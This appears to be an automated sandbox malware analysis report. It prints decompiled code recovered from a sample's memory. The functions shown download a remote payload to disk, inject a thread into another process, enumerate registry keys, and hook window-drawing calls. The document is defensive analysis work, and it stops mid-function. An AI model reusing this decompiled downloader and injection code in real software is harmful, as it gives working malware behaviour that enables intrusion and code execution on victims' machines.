Part of subcall function 00405488: RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?), ref: 004054EC

Part of subcall function 0040DDAD: FindFirstFileW.KERNEL32(?,?,?), ref: 0040DDDE
Part of subcall function 0040DDAD: FindNextFileW.KERNEL32(00000000,?), ref: 0040DE39
Part of subcall function 0040DDAD: FindClose.KERNEL32(00000000), ref: 0040DE44
Part of subcall function 0040DDAD: SetFileAttributesW.KERNEL32(?,00000080,?), ref: 0040DE50
Part of subcall function 0040DDAD: RemoveDirectoryW.KERNEL32(?,?,00000080,?), ref: 0040DE57

SHDeleteKeyW.SHLWAPI(80000001,?,00000003,00000000), ref: 004148D6
CharToOemW.USER32 ref: 004148F2
CharToOemW.USER32 ref: 00414901
ExitProcess.KERNEL32 ref: 00414959

Part of subcall function 0040A154: CharToOemW.USER32 ref: 0040A184
Part of subcall function 0040A154: GetEnvironmentVariableW.KERNEL32(ComSpec,?,00000104,?,?,00000000), ref: 0040A208

Memory Dump Source

Source File: 00000000.00000002.420457127.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.420478874.0000000000423000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6qr4g3TReL.jbxd

Similarity

API ID: File$CharFindPathRemove$DeleteSpec$AttributesCloseDirectoryEnvironmentEventExitExtensionFirstNextObjectOpenProcessRenameSingleSleepValueVariableWait
String ID:
API String ID: 1572960351-0
Opcode ID: 4d40d4beabd148b7b7c0805e8498f01edca39900c780ca321fe6ef531584b40c
Instruction ID: 0e4fa8103c72fcd492f80dd53e6ed5ea4abd8fd1953a1516f596b4fd07db0591
Opcode Fuzzy Hash: 4d40d4beabd148b7b7c0805e8498f01edca39900c780ca321fe6ef531584b40c
Instruction Fuzzy Hash: 4D21A472A083449BC330EBA5DC05FDB779CEBC4360F00492BB548E71A1DB79A545CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 0040A4D6 Relevance: 9.1, APIs: 6, Instructions: 74
filesynchronizationnetworkCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040A4D6(void* _a4, WCHAR* _a8, intOrPtr _a12, void* _a16) {
				char _v5;
				long _v12;
				struct _OVERLAPPED* _v16;
				void* _v20;
				long _v24;
				void* _t28;
				long _t37;
				void* _t41;

				_v5 = 0;
				_t41 = CreateFileW(_a8, 0x40000000, 1, 0, 2, 0x80, 0);
				if(_t41 == 0xffffffff) {
					L15:
					return _v5;
				}
				_t28 = E0040865F(0x1000);
				_v20 = _t28;
				if(_t28 == 0) {
					L13:
					CloseHandle(_t41);
					if(_v5 == 0) {
						E0040DA97(_a8);
					}
					goto L15;
				}
				_v16 = 0;
				while(_a16 == 0 || WaitForSingleObject(_a16, 0) == 0x102) {
					if(InternetReadFile(_a4, _v20, 0x1000,  &_v12) == 0) {
						break;
					}
					if(_v12 == 0) {
						FlushFileBuffers(_t41);
						_v5 = 1;
						break;
					}
					if(WriteFile(_t41, _v20, _v12,  &_v24, 0) == 0) {
						break;
					}
					_t37 = _v12;
					if(_t37 != _v24) {
						break;
					}
					_v16 = _v16 + _t37;
					if(_v16 <= _a12) {
						continue;
					}
					break;
				}
				E0040868F(_v20);
				goto L13;
			}

0x0040a4f3
0x0040a4fc
0x0040a501
0x0040a5a1
0x0040a5a7
0x0040a5a7
0x0040a50c
0x0040a511
0x0040a516
0x0040a58d
0x0040a58e
0x0040a597
0x0040a59c
0x0040a59c
0x00000000
0x0040a597
0x0040a518
0x0040a51b
0x0040a548
0x00000000
0x00000000
0x0040a54d
0x0040a57b
0x0040a581
0x00000000
0x0040a581
0x0040a563
0x00000000
0x00000000
0x0040a565
0x0040a56b
0x00000000
0x00000000
0x0040a56d
0x0040a576
0x00000000
0x00000000
0x00000000
0x0040a578
0x0040a588
0x00000000

APIs

CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 0040A4F6
WaitForSingleObject.KERNEL32(?,00000000), ref: 0040A524
InternetReadFile.WININET(?,?,00001000,?), ref: 0040A540
WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 0040A55B
FlushFileBuffers.KERNEL32(00000000), ref: 0040A57B
CloseHandle.KERNEL32(00000000), ref: 0040A58E

Memory Dump Source

Source File: 00000000.00000002.420457127.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.420478874.0000000000423000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6qr4g3TReL.jbxd

Similarity

API ID: File$BuffersCloseCreateFlushHandleInternetObjectReadSingleWaitWrite
String ID:
API String ID: 3509176705-0
Opcode ID: 1ddb81bbd69d80d759da1c14e06531532332cb2db257c794e6ef259b4821fbda
Instruction ID: 67788725eaa15c74360f702c00dbe0dc5499072464bddeed1f74929990721541
Opcode Fuzzy Hash: 1ddb81bbd69d80d759da1c14e06531532332cb2db257c794e6ef259b4821fbda
Instruction Fuzzy Hash: 9E21AF31900249BFDF11AFA4DC84AAE7B7ABB04345F00497AF951B11E0D7398E658B2A

Uniqueness

Uniqueness Score: -1.00%

Function 0040CE07 Relevance: 9.1, APIs: 6, Instructions: 72
windowtimeCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E0040CE07(int __ecx, intOrPtr* __edx, struct tagPOINT _a4, signed int _a8) {
				intOrPtr* _v8;
				long _v12;
				struct HWND__* _v16;
				int _v20;
				struct HWND__* _v24;
				long _t24;
				struct HWND__* _t33;
				intOrPtr* _t44;

				_push(_a8);
				_t44 = __edx;
				_v8 = __edx;
				_v20 = __ecx;
				_t33 = WindowFromPoint(_a4.x);
				if(_t33 != 0) {
					if(SendMessageTimeoutW(_t33, 0x84, 0, (_a8 & 0x0000ffff) << 0x00000010 | _a4.x & 0x0000ffff, 2, _v20,  &_v12) != 0) {
						_t24 = _v12;
						if(_t24 != 0xffffffff) {
							if(_t44 != 0) {
								 *_t44 = _t24;
							}
						} else {
							_v16 = _t33;
							SetWindowLongW(_t33, 0xfffffff0, GetWindowLongW(_t33, 0xfffffff0) | 0x08000000);
							_t33 = E0040CE07(_v20, _v8, _a4, _a8);
							SetWindowLongW(_v24, 0xfffffff0, GetWindowLongW(_v24, 0xfffffff0) & 0xf7ffffff);
						}
					} else {
						_t33 = 0;
					}
				}
				return _t33;
			}

0x0040ce13
0x0040ce16
0x0040ce1b
0x0040ce1f
0x0040ce29
0x0040ce2d
0x0040ce5c
0x0040ce62
0x0040ce69
0x0040ceba
0x0040cebc
0x0040cebc
0x0040ce6b
0x0040ce74
0x0040ce89
0x0040cea4
0x0040ceb4
0x0040ceb4
0x0040ce5e
0x0040ce5e
0x0040ce5e
0x0040ce5c
0x0040cec6

APIs

WindowFromPoint.USER32(?,?,00000000,?,?,?,00000000), ref: 0040CE23
SendMessageTimeoutW.USER32 ref: 0040CE54
GetWindowLongW.USER32(00000000,000000F0), ref: 0040CE78
SetWindowLongW.USER32 ref: 0040CE89
GetWindowLongW.USER32(?,000000F0), ref: 0040CEA6
SetWindowLongW.USER32 ref: 0040CEB4

Memory Dump Source

Source File: 00000000.00000002.420457127.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.420478874.0000000000423000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6qr4g3TReL.jbxd

Similarity

API ID: Window$Long$FromMessagePointSendTimeout
String ID:
API String ID: 2645164282-0
Opcode ID: 06cdfcb817a06411f6ab8858561ec5cc83300f998f515412ba1d9fdefbfc97ec
Instruction ID: cabf7bbabac0a23343b947380df92affb33f2930f6d148223098dffbde52bd9c
Opcode Fuzzy Hash: 06cdfcb817a06411f6ab8858561ec5cc83300f998f515412ba1d9fdefbfc97ec
Instruction Fuzzy Hash: CC218E71508316ABDB109F24CC80E7B7BA8EB84770F20472ABDB4A63E1D674D9449BD5

Uniqueness

Uniqueness Score: -1.00%

Function 0040D910 Relevance: 9.1, APIs: 6, Instructions: 68
filememoryCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E0040D910(signed int __eax, void* __ecx, void** __esi, long _a4) {
				intOrPtr _v8;
				long _v12;
				void* _t19;
				void* _t20;
				long _t22;
				void* _t23;

				_t33 = __esi;
				asm("sbb eax, eax");
				_t19 = CreateFileW(_a4, 0x80000000,  ~(__eax & 2) & 0x00000006 | 0x00000001, 0, 3, 0, 0);
				__esi[2] = _t19;
				if(_t19 == 0xffffffff) {
					L11:
					_t20 = 0;
				} else {
					__imp__GetFileSizeEx(_t19,  &_v12);
					if(_t19 == 0 || _v8 != 0) {
						L10:
						CloseHandle(_t33[2]);
						goto L11;
					} else {
						_t22 = _v12;
						__esi[1] = _t22;
						if(_t22 != 0) {
							_t23 = VirtualAlloc(0, _t22, 0x3000, 4);
							 *__esi = _t23;
							if(_t23 == 0) {
								goto L10;
							} else {
								if(ReadFile(__esi[2], _t23, __esi[1],  &_a4, 0) == 0 || _a4 != __esi[1]) {
									VirtualFree( *_t33, 0, 0x8000);
									goto L10;
								} else {
									goto L5;
								}
							}
						} else {
							 *__esi = 0;
							L5:
							_t20 = 1;
						}
					}
				}
				return _t20;
			}

0x0040d910
0x0040d923
0x0040d935
0x0040d93b
0x0040d941
0x0040d9b1
0x0040d9b1
0x0040d943
0x0040d948
0x0040d950
0x0040d9a8
0x0040d9ab
0x00000000
0x0040d957
0x0040d957
0x0040d95a
0x0040d95f
0x0040d970
0x0040d976
0x0040d97a
0x00000000
0x0040d97c
0x0040d990
0x0040d9a2
0x00000000
0x00000000
0x00000000
0x00000000
0x0040d990
0x0040d961
0x0040d961
0x0040d963
0x0040d963
0x0040d963
0x0040d95f
0x0040d950
0x0040d9b5

APIs

CreateFileW.KERNEL32(?,80000000,?,00000000,00000003,00000000,00000000), ref: 0040D935
GetFileSizeEx.KERNEL32(00000000,?,?,00000000,00000003,00000000,00000000), ref: 0040D948
VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,00000000,00000003,00000000,00000000), ref: 0040D970
ReadFile.KERNEL32(?,00000000,?,?,00000000,?,00000000,00000003,00000000,00000000), ref: 0040D988
VirtualFree.KERNEL32(?,00000000,00008000,?,00000000,00000003,00000000,00000000), ref: 0040D9A2
CloseHandle.KERNEL32(?,?,00000000,00000003,00000000,00000000), ref: 0040D9AB

Memory Dump Source

Source File: 00000000.00000002.420457127.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.420478874.0000000000423000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6qr4g3TReL.jbxd

Similarity

API ID: File$Virtual$AllocCloseCreateFreeHandleReadSize
String ID:
API String ID: 1974014688-0
Opcode ID: bf37f8aa8f67470804b95dc7254514b24cbee2896d4f1165ffd5e2dc2925769e
Instruction ID: e1ada1a56e30fa0d28d3e8d6d74a97855c37f7972970db930864e06d8c8c2174
Opcode Fuzzy Hash: bf37f8aa8f67470804b95dc7254514b24cbee2896d4f1165ffd5e2dc2925769e
Instruction Fuzzy Hash: 9211B2B1500200BFDB219F64CD09E6B7BB8EB55750B10492DF592F61A0D334A944CB28

Uniqueness

Uniqueness Score: -1.00%

Function 00405136 Relevance: 9.1, APIs: 6, Instructions: 54
synchronizationthreadinjectionCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E00405136(void* __ecx, long _a4, intOrPtr _a8) {
				char _v5;
				void* __edi;
				void* __esi;
				void* _t10;
				void* _t14;
				void* _t23;
				void* _t25;
				void* _t26;

				_t21 = __ecx;
				_push(__ecx);
				_v5 = 0;
				_t23 = OpenProcess(0x47a, 0, _a4);
				_t28 = _t23;
				if(_t23 != 0) {
					_push(_t25);
					_t10 = E00419E13(_t21, _t23, _t25, _t28, _a8, 0);
					_t26 = _t10;
					if(_t26 != 0) {
						_t14 = CreateRemoteThread(_t23, 0, 0, _t10 -  *0x42187c + E0041A5DF, 0, 0, 0);
						_a4 = _t14;
						if(_t14 == 0) {
							VirtualFreeEx(_t23, _t26, 0, 0x8000);
						} else {
							WaitForSingleObject(_t14, 0x2710);
							CloseHandle(_a4);
							_v5 = 1;
						}
					}
					CloseHandle(_t23);
				}
				return _v5;
			}

0x00405136
0x00405139
0x00405147
0x00405150
0x00405152
0x00405154
0x00405156
0x0040515b
0x00405160
0x00405164
0x00405178
0x0040517e
0x00405183
0x004051a8
0x00405185
0x0040518b
0x00405194
0x0040519a
0x0040519a
0x00405183
0x004051af
0x004051b5
0x004051bc

APIs

OpenProcess.KERNEL32(0000047A,00000000,?), ref: 0040514A
CreateRemoteThread.KERNEL32(00000000,00000000,00000000,-0083BE5B,00000000,00000000,00000000), ref: 00405178
WaitForSingleObject.KERNEL32(00000000,00002710), ref: 0040518B
CloseHandle.KERNEL32(?), ref: 00405194
VirtualFreeEx.KERNEL32(00000000,00000000,00000000,00008000), ref: 004051A8
CloseHandle.KERNEL32(00000000,?,00000000), ref: 004051AF

Memory Dump Source

Source File: 00000000.00000002.420457127.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.420478874.0000000000423000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6qr4g3TReL.jbxd

Similarity

API ID: CloseHandle$CreateFreeObjectOpenProcessRemoteSingleThreadVirtualWait
String ID:
API String ID: 14861764-0
Opcode ID: 6b0c37aa747075476a93aba05b066e7f4028a52f7ea737008b5898490451062f
Instruction ID: 79ee06a992d63e52c56da058f4884a8335c84936dfc669a5d15071295c807b18
Opcode Fuzzy Hash: 6b0c37aa747075476a93aba05b066e7f4028a52f7ea737008b5898490451062f
Instruction Fuzzy Hash: EC019EB2404248BFEB112B74DDCCEAF3E6CDB49394B004179F901F6160C6794C468A78

Uniqueness

Uniqueness Score: -1.00%

Function 0041660E Relevance: 9.1, APIs: 6, Instructions: 54
windowCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E0041660E(struct HWND__* _a4, struct HRGN__* _a8, int _a12) {
				void* _t21;
				int _t22;
				signed int _t23;
				struct HWND__* _t27;
				char* _t31;

				_t27 = _a4;
				if(( *0x421868 & 0x00000004) == 0 || E00419F02() == 0) {
					L7:
					return GetUpdateRgn(_t27, _a8, _a12);
				} else {
					_t31 = TlsGetValue( *0x421eac);
					if(_t31 == 0 || _t27 !=  *((intOrPtr*)(_t31 + 4))) {
						goto L7;
					} else {
						SetRectRgn(_a8,  *(_t31 + 0xc),  *(_t31 + 0x10),  *(_t31 + 0x14),  *(_t31 + 0x18));
						if(_a12 != 0) {
							_t22 = SaveDC( *(_t31 + 8));
							_t23 = SendMessageW(_t27, 0x14,  *(_t31 + 8), 0);
							asm("sbb eax, eax");
							 *((intOrPtr*)(_t31 + 0x1c)) =  ~_t23 + 1;
							RestoreDC( *(_t31 + 8), _t22);
						}
						 *_t31 = 1;
						_t21 = 2;
						return _t21;
					}
				}
			}

0x00416619
0x0041661d
0x0041668f
0x00000000
0x00416628
0x00416634
0x00416638
0x00000000
0x0041663f
0x0041664e
0x00416658
0x0041665e
0x0041666e
0x00416676
0x0041667d
0x00416680
0x00416686
0x00416689
0x0041668c
0x00000000
0x0041668c
0x00416638

APIs

GetUpdateRgn.USER32 ref: 00416696

Part of subcall function 00419F02: WaitForSingleObject.KERNEL32(00000000,0040506D,00405103,00000000), ref: 00419F0A

TlsGetValue.KERNEL32 ref: 0041662E
SetRectRgn.GDI32(?,?,?,?,?), ref: 0041664E
SaveDC.GDI32(?), ref: 0041665E
SendMessageW.USER32(?,00000014,?,00000000), ref: 0041666E
RestoreDC.GDI32(?,00000000), ref: 00416680

Memory Dump Source

Source File: 00000000.00000002.420457127.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.420478874.0000000000423000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6qr4g3TReL.jbxd

Similarity

API ID: MessageObjectRectRestoreSaveSendSingleUpdateValueWait
String ID:
API String ID: 3142230470-0
Opcode ID: 7ef9fad7128ce454a2f807c7349288e8e7e07b6edbd61329825a7022eeed5887
Instruction ID: 87e9370b29e86c3ed7166a4cacbfe05d8e440ea07b0ce61dcf2f0c659eeefdc5
Opcode Fuzzy Hash: 7ef9fad7128ce454a2f807c7349288e8e7e07b6edbd61329825a7022eeed5887
Instruction Fuzzy Hash: 4D119E31000344AFCB325F64EC48FA7BBA9EB08310F01492AFA8A91571C336D890DB18

Uniqueness

Uniqueness Score: -1.00%

Function 0040A268 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 46
networkCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040A268(signed int __eax, char* __ecx) {
				short _v28;
				char* _v32;
				signed int _t5;
				void* _t12;
				void* _t14;
				char* _t15;
				void* _t18;

				_t15 = __ecx;
				_t5 = __eax;
				if(__ecx == 0) {
					_t15 = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1)";
				}
				_t14 = InternetOpenA(_t15,  !_t5 & 0x00000001, 0, 0, 0);
				if(_t14 == 0) {
					L7:
					return 0;
				}
				_t18 = 0;
				do {
					_t1 = _t18 + 0x420394; // 0x420394
					_t2 = _t18 + 0x420390; // 0x2
					InternetSetOptionA(_t14,  *_t2, _t1, 4);
					_t18 = _t18 + 8;
				} while (_t18 < 0x18);
				_t12 = InternetConnectA(_t14, _v32, _v28, 0, 0, 3, 0, 0);
				if(_t12 == 0) {
					InternetCloseHandle(_t14);
					goto L7;
				}
				return _t12;
			}

0x0040a268
0x0040a268
0x0040a26e
0x0040a270
0x0040a270
0x0040a285
0x0040a289
0x0040a2cd
0x00000000
0x0040a2cd
0x0040a28c
0x0040a28e
0x0040a290
0x0040a297
0x0040a29e
0x0040a2a4
0x0040a2a7
0x0040a2bb
0x0040a2c4
0x0040a2c7
0x00000000
0x0040a2c7
0x0040a2d1

APIs

InternetOpenA.WININET(?,?,00000000,00000000,00000000), ref: 0040A27F
InternetSetOptionA.WININET(00000000,00000002,00420394,00000004), ref: 0040A29E
InternetConnectA.WININET(00000000,00000000,00000000,00000000,00000000,00000003,00000000,00000000), ref: 0040A2BB
InternetCloseHandle.WININET(00000000), ref: 0040A2C7

Strings

Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1), xrefs: 0040A270, 0040A27E

Memory Dump Source

Source File: 00000000.00000002.420457127.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.420478874.0000000000423000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6qr4g3TReL.jbxd

Similarity

API ID: Internet$CloseConnectHandleOpenOption
String ID: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1)
API String ID: 910987326-3737944857
Opcode ID: b556a47db5c04974e16368aaa581707092652d88ff172490a39975ffffd1585b
Instruction ID: 7cb989aeb59c2c8979d04b925709c393bb115b6ce533213a3bd05ced818cfba9
Opcode Fuzzy Hash: b556a47db5c04974e16368aaa581707092652d88ff172490a39975ffffd1585b
Instruction Fuzzy Hash: E1F0F6322003007FD7225B614D8CD6B7A6EFBC9B61B04043DF956F1271C53688208339

Uniqueness

Uniqueness Score: -1.00%

Function 0040A6DC Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 44
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E0040A6DC() {
				char _v8;
				struct HINSTANCE__* _v12;
				void* _v1036;
				struct HINSTANCE__* _t13;
				_Unknown_base(*)()* _t15;
				char _t22;
				void* _t28;

				_t22 = 0;
				_t13 = LoadLibraryA("urlmon.dll");
				_v12 = _t13;
				if(_t13 != 0) {
					_t15 = GetProcAddress(_t13, "ObtainUserAgentString");
					if(_t15 != 0) {
						_push( &_v8);
						_push( &_v1036);
						_push(0);
						_v8 = 0x3ff;
						_v1036 = 0;
						if( *_t15() == 0) {
							if(_v8 > 0x3ff) {
								_v8 = 0x3ff;
							}
							 *((char*)(_t28 + _v8 - 0x408)) = _t22;
							_t22 = E00408AEF( &_v1036 | 0xffffffff,  &_v1036);
						}
					}
					FreeLibrary(_v12);
				}
				return _t22;
			}

0x0040a6eb
0x0040a6ed
0x0040a6f3
0x0040a6f8
0x0040a700
0x0040a708
0x0040a70e
0x0040a715
0x0040a71b
0x0040a71c
0x0040a71f
0x0040a729
0x0040a72e
0x0040a730
0x0040a730
0x0040a736
0x0040a74c
0x0040a74c
0x0040a74e
0x0040a752
0x0040a752
0x0040a75c

APIs

LoadLibraryA.KERNEL32(urlmon.dll), ref: 0040A6ED
GetProcAddress.KERNEL32(00000000,ObtainUserAgentString), ref: 0040A700
FreeLibrary.KERNEL32(?), ref: 0040A752

Strings

urlmon.dll, xrefs: 0040A6E6
ObtainUserAgentString, xrefs: 0040A6FA

Memory Dump Source

Source File: 00000000.00000002.420457127.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.420478874.0000000000423000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6qr4g3TReL.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: ObtainUserAgentString$urlmon.dll
API String ID: 145871493-2685262326
Opcode ID: 3cbbba2cfdcb0bd32f45b2cd2c0c7e161ed379b20b4766fbe07bc78e402e905a
Instruction ID: e21eb386765a5c9874069ed0c4c4cf7434af92654d0fdfe2d4915311c3161ff3
Opcode Fuzzy Hash: 3cbbba2cfdcb0bd32f45b2cd2c0c7e161ed379b20b4766fbe07bc78e402e905a
Instruction Fuzzy Hash: 30018471940214BBCB11ABE89E845DE7BBCAB04710F2045FEF651F32D0DA748F448B69

Uniqueness

Uniqueness Score: -1.00%

Function 00417FC6 Relevance: 7.7, APIs: 5, Instructions: 210
registryCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E00417FC6(char* __ecx, void* __eflags) {
				void* _v8;
				int _v12;
				signed int _v16;
				signed int _v20;
				void* _v24;
				int _v28;
				intOrPtr _v32;
				char _v36;
				intOrPtr _v40;
				char* _v44;
				char _v56;
				char _v76;
				char _v96;
				char _v116;
				char _v148;
				char _v212;
				char _v276;
				short _v796;
				void* __edi;
				void* __esi;
				signed int _t73;
				void* _t74;
				void* _t76;
				void* _t82;
				void* _t84;
				void* _t86;
				void* _t88;
				int _t104;
				int _t112;
				int _t116;
				void* _t117;
				signed int _t119;
				void* _t123;
				void* _t127;
				int _t138;
				signed int _t140;
				char* _t145;
				signed int _t149;
				void* _t151;
				void* _t152;

				_t132 = __ecx;
				_t73 = E0040865F(0xc08);
				_t138 = 0;
				_v16 = _t73;
				if(_t73 == 0) {
					return _t73;
				} else {
					_t74 = 0x59;
					E00412F05(_t74,  &_v212);
					_t145 =  &_v276;
					_t76 = 0x5a;
					E00412F05(_t76, _t145);
					_v44 =  &_v212;
					_v40 = _t145;
					E00408742( &_v36,  &_v36, 0, 8);
					_t82 = 0x5b;
					E00412F05(_t82,  &_v116);
					_t84 = 0x5c;
					E00412F05(_t84,  &_v96);
					_t86 = 0x5d;
					E00412F05(_t86,  &_v56);
					_t149 =  &_v76;
					_t88 = 0x5e;
					E00412F05(_t88, _t149);
					_v20 = 0;
					do {
						if(RegOpenKeyExW(0x80000001,  *(_t151 + _v20 * 4 - 0x28), _t138, 8,  &_v8) != 0) {
							goto L22;
						}
						_v28 = _t138;
						_v12 = 0x104;
						if(RegEnumKeyExW(_v8, _t138,  &_v796,  &_v12, _t138, _t138, _t138, _t138) != 0) {
							L21:
							RegCloseKey(_v8);
							goto L22;
						} else {
							goto L4;
						}
						do {
							L4:
							_t140 = _v16;
							_v28 = _v28 + 1;
							_t104 = E0040C7E3(_v8, _t132, _t140,  &_v796,  &_v116, 0xff);
							_t149 = _t149 | 0xffffffff;
							_v12 = _t104;
							if(_t104 != _t149 && _t104 > 0) {
								_t141 = _t140 + 0x1fe;
								_t112 = E0040C7E3(_v8, _t132, _t140 + 0x1fe,  &_v796,  &_v96, 0xff);
								_v12 = _t112;
								if(_t112 == _t149 || _t112 <= 0) {
									_t116 = E0040C7E3(_v8, _t132, _t141,  &_v796,  &_v56, 0xff);
									_v12 = _t116;
									if(_t116 == _t149 || _t116 <= 0) {
										goto L19;
									} else {
										goto L10;
									}
								} else {
									L10:
									_t117 = _v8;
									_t132 =  &_v796;
									_v24 = _t117;
									if(RegOpenKeyExW(_t117,  &_v796, 0, 1,  &_v24) != 0) {
										_t119 = _t149;
									} else {
										_t149 =  &_v24;
										_t119 = E0040C908(_t149,  &_v76, 0, _t141 + 0x1fe, 0xff);
									}
									_v12 = _t119;
									if(_t119 != 0xffffffff && _t119 > 0) {
										_v24 = _v16 + 0x1fe;
										if(E00417F6B(_v16 + 0x3fc) > 0) {
											_t123 = 0x2c;
											E00412F05(_t123,  &_v148);
											_t149 = _v16;
											_push(_t149);
											_push(_v24 + 0x1fe);
											_push(_t149 + 0x1fe);
											_t132 =  &_v148;
											_t127 = E00409450(_v24 + 0x1fe, 0x307, _v24 + 0x3fc,  &_v148);
											_t152 = _t152 + 0x10;
											if(_t127 > 0) {
												_t132 =  &_v36;
												if(E00408A85(_t127,  &_v36, _t149 + 0x5fa) != 0) {
													_v32 = _v32 + 1;
												}
											}
										}
									}
									goto L19;
								}
							}
							L19:
							_v12 = 0x104;
						} while (RegEnumKeyExW(_v8, _v28,  &_v796,  &_v12, 0, 0, 0, 0) == 0);
						_t138 = 0;
						goto L21;
						L22:
						_v20 = _v20 + 1;
					} while (_v20 < 2);
					E0040868F(_v16);
					if(_v32 <= _t138) {
						return E0040868F(_v36);
					}
					_push(0x5f);
					return E00416E46(0x307, _v36);
				}
			}

0x00417fc6
0x00417fd7
0x00417fdc
0x00417fde
0x00417fe3
0x00418241
0x00417fe9
0x00417ff1
0x00417ff2
0x00417ff9
0x00417fff
0x00418000
0x0041800b
0x00418012
0x0041801a
0x00418024
0x00418025
0x0041802f
0x00418030
0x0041803a
0x0041803b
0x00418042
0x00418045
0x00418046
0x0041804b
0x00418053
0x0041806e
0x00000000
0x00000000
0x00418087
0x0041808a
0x00418099
0x00418205
0x00418208
0x00000000
0x00000000
0x00000000
0x00000000
0x0041809f
0x0041809f
0x0041809f
0x004180a2
0x004180b4
0x004180b9
0x004180bc
0x004180c1
0x004180de
0x004180e4
0x004180e9
0x004180ee
0x00418103
0x00418108
0x0041810d
0x00000000
0x00000000
0x00000000
0x00000000
0x0041811b
0x0041811b
0x0041811b
0x00418126
0x0041812e
0x00418139
0x00418153
0x0041813b
0x00418149
0x0041814c
0x0041814c
0x00418155
0x0041815b
0x0041816f
0x00418179
0x00418183
0x00418184
0x00418189
0x0041818f
0x00418195
0x0041819c
0x0041819d
0x004181af
0x004181b4
0x004181b9
0x004181c8
0x004181d2
0x004181d4
0x004181d4
0x004181d2
0x004181b9
0x00418179
0x00000000
0x0041815b
0x004180ee
0x004181d7
0x004181eb
0x004181fb
0x00418203
0x00000000
0x0041820e
0x0041820e
0x00418211
0x0041821e
0x00418226
0x00000000
0x00418238
0x0041822b
0x00000000
0x0041822e

APIs

RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000008,?,?,00000000,00000008), ref: 00418066
RegEnumKeyExW.ADVAPI32 ref: 00418091
RegCloseKey.ADVAPI32(?), ref: 00418208

Part of subcall function 0040C7E3: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,?,00000104,00000000,?,?,00406E71,?,?,00000104), ref: 0040C7F8

RegEnumKeyExW.ADVAPI32 ref: 004181F5

Part of subcall function 0040C7E3: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000104,?,?,?,00406E71,?,?,00000104), ref: 0040C876

RegOpenKeyExW.ADVAPI32(?,?,00000000,00000001,?,?,?,000000FF,?,?,000000FF,?,?,000000FF), ref: 00418131

Memory Dump Source

Source File: 00000000.00000002.420457127.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.420478874.0000000000423000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6qr4g3TReL.jbxd

Similarity

API ID: Open$Enum$CloseEnvironmentExpandStrings
String ID:
API String ID: 2343474859-0
Opcode ID: bdac32cfc53eb3886955d5301d859a8d358981ff231c72f8adce92ba2adbe2f5
Instruction ID: 0d9fa2ed659bc232192e2336765d2bab92c69504401581ce441f42cbdc7ed460
Opcode Fuzzy Hash: bdac32cfc53eb3886955d5301d859a8d358981ff231c72f8adce92ba2adbe2f5
Instruction Fuzzy Hash: C8715D72D00219ABDB11DBE5CD45BEFB7BCEF08704F10056ABA05F3191EB789A858B58

Uniqueness

Uniqueness Score: -1.00%

Function 00413470 Relevance: 7.7, APIs: 5, Instructions: 196
stringCOMMON

Download Yara Rule

C-Code - Quality: 99%

			E00413470(WCHAR* __ecx, short _a4) {
				char _v268;
				signed short _v644;
				char _v997;
				signed int _v1044;
				char _v1060;
				short _v1580;
				short _v1584;
				signed int _v1588;
				short _v1592;
				void* _v1596;
				intOrPtr _v1600;
				intOrPtr _v1604;
				char _v1608;
				intOrPtr _v1612;
				long _v1616;
				signed int _v1620;
				void* _v1621;
				signed int _v1624;
				void* __ebx;
				void* __esi;
				signed int _t54;
				signed int _t63;
